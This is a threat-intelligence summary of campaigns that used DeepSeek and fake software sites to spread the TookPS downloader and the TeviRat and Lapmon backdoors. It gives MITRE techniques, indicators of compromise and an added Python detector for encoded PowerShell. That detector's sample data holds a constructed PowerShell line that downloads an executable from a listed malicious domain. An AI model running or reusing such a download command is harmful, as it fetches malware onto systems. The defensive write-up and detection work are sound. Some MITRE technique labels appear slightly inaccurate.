TookPS: DeepSeek isn’t the only game in town

A recent study has exposed a series of malicious campaigns that used the DeepSeek LLM as bait for distributing malware, including the TookPS downloader. The campaign relied on fraudulent websites impersonating well-known software and led to extensive attacks on individuals and organizations alike, ultimately granting the attackers covert access to victims’ systems.

Affected: individuals, organizations, software users

Key points:

  • Malicious campaigns exploited DeepSeek as a lure for distributing the TookPS downloader.
  • Fraudulent websites imitating official sources for software like UltraViewer, AutoCAD, and SketchUp were identified.
  • Telemetry analysis uncovered file names linked to popular applications including Ableton and Quicken.
  • The infection chain initiated by Trojan-Downloader.Win32.TookPS was detailed.
  • Attackers utilized PowerShell scripts to establish a tunnel back to their command and control (C2) servers.
  • Malware samples varied but maintained a consistent command structure.
  • Backdoor.Win32.TeviRat and Backdoor.Win32.Lapmon malware were delivered to compromised systems.
  • The campaign’s infrastructure primarily involved newly registered domains and specific IP addresses.
  • Strong recommendations for users and organizations to avoid pirated software and implement robust security policies were outlined.

MITRE Techniques:

  • Command and Control (T1071) – The TookPS downloader reached out to its C2 server for additional commands via PowerShell executed on the victim’s device.
  • Remote Access Software (T1219) – The deployment of Backdoor.Win32.TeviRat used DLL sideloading involving TeamViewer to gain remote access.
  • PowerShell (T1086) – The downloader executed PowerShell scripts for communication with the C2 server and further malware deployment.
  • Data Encoding (T1140) – The commands involved base64-encoded data for communication and script execution.
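The two PowerShell-related techniques above (C2 communication via PowerShell and base64-encoded commands) can be hunted for in process-creation telemetry by decoding `-EncodedCommand` arguments (UTF-16LE, then base64) and matching the recovered script against the report's network indicators. The following is an added example for defenders, not code from the Securelist write-up or from the malware; the command lines it analyses are constructed, and the set of accepted flag spellings is an assumption about powershell.exe's argument parsing.

```python
import base64
import re

# Network indicators published in the report, refanged for matching.
IOC_DOMAINS = {"bsrecov4.digital", "invoicingtools.com", "twomg.xyz"}
IOC_IPS = {"88.119.175.187"}

# powershell.exe accepts -e / -ec / -enc / -EncodedCommand (assumed spellings).
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Return the -EncodedCommand form of a script (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Recover the script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a well-formed encoded command


def analyse(cmdline: str) -> dict:
    """Flag encoded PowerShell and any C2 indicator in the (decoded) command."""
    decoded = decode_encoded_command(cmdline)
    haystack = (decoded if decoded is not None else cmdline).lower()
    hits = sorted(ioc for ioc in IOC_DOMAINS | IOC_IPS if ioc in haystack)
    return {"encoded": decoded is not None, "decoded": decoded, "ioc_hits": hits}


# Constructed sample command lines (not captured from TookPS).
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -enc " + encode_powershell(
        "Invoke-WebRequest https://bsrecov4.digital/x -OutFile $env:TEMP\\a.exe"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -e " + encode_powershell("Get-Date"),
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(analyse(line))
```

Only the first sample line is both encoded and contacts a listed indicator; the third shows that encoding alone is not evidence of compromise, so the indicator match is what should drive alert severity.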

Indicators of Compromise:

  • [MD5] 2AEF18C97265D00358D6A778B9470960
  • [URL] bsrecov4[.]digital
  • [URL] invoicingtools[.]com
  • [URL] twomg[.]xyz
  • [IP] 88[.]119.175.187

Full Story: https://securelist.com/tookps/116019/